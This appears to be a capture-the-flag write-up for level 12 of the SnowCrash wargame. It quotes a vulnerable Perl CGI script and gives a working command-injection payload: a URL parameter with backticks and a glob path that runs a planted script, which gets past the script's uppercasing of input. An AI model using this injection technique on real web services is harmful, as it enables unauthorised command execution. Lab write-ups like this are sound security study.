# Level12
- There is a perl script:
	```bash
	#!/usr/bin/env perl
	# localhost:4646
	[...]
	  $nn = $_[1];
	  $xx = $_[0];
	  $xx =~ tr/a-z/A-Z/;
	  $xx =~ s/\s.*//;
	  @output = `egrep "^$xx" /tmp/xd 2>&1`;
	[...]
	```
- It seems it's vulnerable to an injection as it does a backtick call in the egrep.
	```bash
	level12@SnowCrash:/tmp$ echo 'getflag > /tmp/flag12' > EXPLOIT
	level12@SnowCrash:/tmp$ chmod +x EXPLOIT
	```
- So we just need to access with our web browser:
	```web
	http://<VM_IP>:4646/?x="`/*/EXPLOIT`"
	```
- And then we get:
	```bash
	level12@SnowCrash:/tmp$ cat flag12
	```
